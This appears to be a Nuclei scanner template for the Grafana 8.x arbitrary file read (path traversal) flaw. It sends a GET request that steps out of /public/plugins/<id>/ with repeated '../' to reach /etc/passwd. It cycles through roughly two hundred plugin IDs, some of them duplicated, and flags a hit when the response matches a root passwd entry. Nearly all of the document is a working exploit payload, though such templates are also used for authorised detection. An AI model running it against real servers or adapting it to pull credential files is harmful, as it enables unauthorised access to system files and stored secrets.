id: grafana-file-read

info:
  name: Grafana v8.x Arbitrary File Read
  author: z0ne,dhiyaneshDk
  severity: high
  reference:
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - https://twitter.com/pyn3rd/status/1468138032477859841
    - https://twitter.com/naglinagli/status/1468155313182416899
  tags: grafana,lfi
  remediation: The latest Grafana unpatched 0 Day LFI  is now being actively exploited, it affects only Grafana 8.0+, Vulnerable companies should revoke the secrets they store at their /etc/grafana/grafana.ini ASAP as there is no official fix in the meantime.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"

    payloads:
      plugin-id:
        - grafana-oracle-datasource
        - grafana-splunk-datasource
        - grafana-synthetic-monitoring-app
        - grafana-mongodb-datasource
        - grafana-jira-datasource
        - grafana-snowflake-datasource
        - grafana-googlesheets-datasource
        - alexanderzobnin-zabbix-app
        - grafana-synthetic-monitoring-app
        - grafana-piechart-panel
        - marcusolsson-gantt-panel
        - grafana-worldmap-panel
        - alexanderzobnin-zabbix-app
        - grafana-worldmap-panel
        - voxter-app
        - grafana-clock-panel
        - grafana-piechart-panel
        - percona-percona-app
        - alertlist
        - cloudwatch
        - dashlist
        - elasticsearch
        - graph
        - graphite
        - heatmap
        - influxdb
        - mysql
        - opentsdb
        - pluginlist
        - postgres
        - prometheus
        - singlestat
        - stackdriver
        - table
        - text
        - satellogic-3d-globe-panel
        - aceiot-svg-panel
        - ryantxu-ajax-panel
        - akumuli-datasource
        - grafana-athena-datasource
        - grafana-redshift-datasource
        - grafana-timestream-datasource
        - praj-ams-datasource
        - macropower-analytics-panel
        - ryantxu-annolist-panel
        - novalabs-annotations-panel
        - michaeldmoore-annunciator-panel
        - anodot-datasource
        - anodot-panel
        - hadesarchitect-cassandra-datasource
        - thalysantana-appcenter-datasource
        - dlopes7-appdynamics-datasource
        - grafana-iot-sitewise-datasource
        - grafana-iot-twinmaker-app
        - grafana-azure-data-explorer-datasource
        - grafana-azure-monitor-datasource
        - volkovlabs-image-panel
        - belugacdn-app
        - farski-blendstat-panel
        - rackerlabs-blueflood-datasource
        - bmchelix-ade-datasource
        - yesoreyeram-boomtable-panel
        - yesoreyeram-boomtheme-panel
        - bosun-app
        - digiapulssi-breadcrumb-panel
        - digrich-bubblechart-panel
        - speakyourcode-button-panel
        - cloudspout-button-panel
        - neocat-cal-heatmap-panel
        - marcusolsson-calendar-panel
        - petrslavotinek-carpetplot-panel
        - sebastiangunreben-cdf-panel
        - yeya24-chaosmesh-datasource
        - vertamedia-clickhouse-datasource
        - foursquare-clouderamanager-datasource
        - cloudflare-app
        - cognitedata-datasource
        - snuids-svg-panel
        - integrationmatters-comparison-panel
        - sbueringer-consul-datasource
        - marcusolsson-csv-datasource
        - briangann-gauge-panel
        - dalmatinerdb-datasource
        - andig-darksky-datasource
        - grafana-datadog-datasource
        - briangann-datatable-panel
        - devicehive-devicehive-datasource
        - devopsprodigy-kubegraf-app
        - jdbranham-diagram-panel
        - grafana-discourse-datasource
        - natel-discrete-panel
        - abhisant-druid-datasource
        - grafadruid-druid-datasource
        - dalvany-image-panel
        - marcusolsson-dynamictext-panel
        - grafana-dynatrace-datasource
        - bilibala-echarts-panel
        - larona-epict-panel
        - ayoungprogrammer-finance-datasource
        - clarity89-finnhub-datasource
        - agenty-flowcharting-panel
        - verticle-flowhook-datasource
        - marcusolsson-gantt-panel
        - citilogics-geoloop-panel
        - grafana-github-datasource
        - grafana-gitlab-datasource
        - ddurieux-glpi-app
        - gnocchixyz-gnocchi-datasource
        - doitintl-bigquery-datasource
        - grafana-googlesheets-datasource
        - mtanda-google-calendar-datasource
        - grafana-enterprise-logs-app
        - grafana-metrics-enterprise-app
        - grafana-enterprise-traces-app
        - grafana-image-renderer
        - fifemon-graphql-datasource
        - groonga-datasource
        - grafana-guidedtour-panel
        - hawkular-datasource
        - savantly-heatmap-panel
        - mtanda-heatmap-epoch-panel
        - udoprog-heroic-datasource
        - spotify-heroic-datasource
        - marcusolsson-hexmap-panel
        - mtanda-histogram-panel
        - grafana-honeycomb-datasource
        - marcusolsson-hourly-heatmap-panel
        - aidanmountford-html-panel
        - gapit-htmlgraphics-panel
        - humio-datasource
        - ibm-apm-datasource
        - pierosavi-imageit-panel
        - yesoreyeram-infinity-datasource
        - natel-influx-admin-panel
        - instana-datasource
        - itrs-hub-datasource
        - grafana-jira-datasource
        - simpod-json-datasource
        - marcusolsson-json-datasource
        - grafana-k6cloud-datasource
        - grafana-kairosdb-datasource
        - paytm-kapacitor-datasource
        - aquaqanalytics-kdbadaptor-datasource
        - lightstep-metrics-datasource
        - linksmart-hds-datasource
        - linksmart-sensorthings-datasource
        - woutervh-mapbox-panel
        - flaminggoat-maptrack3d-panel
        - thiagoarrais-matomotracking-panel
        - goshposh-metaqueries-datasource
        - meteostat-meteostat-datasource
        - monasca-datasource
        - grafana-mongodb-datasource
        - monitoringartist-monitoringart-datasource
        - moogsoft-aiops-app
        - michaeldmoore-multistat-panel
        - radensolutions-netxms-datasource
        - grafana-newrelic-datasource
        - ntop-ntopng-datasource
        - grafana-opcua-datasource
        - grafana-es-open-distro-datasource
        - fastweb-openfalcon-datasource
        - gridprotectionalliance-openhistorian-datasource
        - opennms-helm-app
        - grafana-opensearch-datasource
        - oci-logs-datasource
        - oci-metrics-datasource
        - grafana-oracle-datasource
        - digiapulssi-organisations-panel
        - gridprotectionalliance-osisoftpi-datasource
        - xginn8-pagerduty-datasource
        - isaozler-paretochart-panel
        - zuburqan-parity-report-panel
        - jeanbaptistewatenberg-percent-panel
        - sskgo-perfcurve-panel
        - bessler-pictureit-panel
        - pixie-pixie-datasource
        - natel-plotly-panel
        - ae3e-plotly-panel
        - sni-pnp-datasource
        - grafana-polystat-panel
        - corpglory-progresslist-panel
        - camptocamp-prometheus-alertmanager-datasource
        - jasonlashua-prtg-datasource
        - pyroscope-datasource
        - pyroscope-panel
        - quasardb-datasource
        - snuids-radar-panel
        - redis-datasource
        - redis-app
        - redis-explorer-app
        - ccin2p3-riemann-datasource
        - grafana-salesforce-datasource
        - netsage-sankey-panel
        - grafana-saphana-datasource
        - scadavis-synoptic-panel
        - michaeldmoore-scatter-panel
        - grafana-sentry-datasource
        - mxswat-separator-panel
        - novatec-sdg-panel
        - grafana-servicenow-datasource
        - sidewinder-datasource
        - fzakaria-simple-annotations-datasource
        - innius-grpc-datasource
        - grafana-simple-json-datasource
        - grafana-singlestat-panel
        - blackmirror1-singlestat-math-panel
        - skydive-datasource
        - grafana-snowflake-datasource
        - pue-solr-datasource
        - grafana-splunk-datasource
        - grafana-splunk-monitoring-datasource
        - frser-sqlite-datasource
        - stagemonitor-elasticsearch-app
        - marcusolsson-static-datasource
        - blackmirror1-statusbygroup-panel
        - vonage-status-panel
        - flant-statusmap-panel
        - grafana-strava-datasource
        - streamr-datasource
        - fetzerch-sunandmoon-datasource
        - marcuscalidus-svg-panel
        - grafana-synthetic-monitoring-app
        - teamviewer-datasource
        - tencentcloud-monitor-app
        - sni-thruk-datasource
        - williamvenner-timepickerbuttons-panel
        - gretamosa-topology-panel
        - gowee-traceroutemap-panel
        - alexandra-trackmap-panel
        - pr0ps-trackmap-panel
        - snuids-trafficlights-panel
        - smartmakers-trafficlight-panel
        - marcusolsson-treemap-panel
        - factry-untimely-panel
        - natel-usgs-datasource
        - vertica-grafana-datasource
        - innius-video-panel
        - ovh-warp10-datasource
        - auxmoney-waterfall-panel
        - grafana-wavefront-datasource
        - fatcloud-windrose-panel
        - magnesium-wordcloud-panel
        - grafana-x-ray-datasource

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

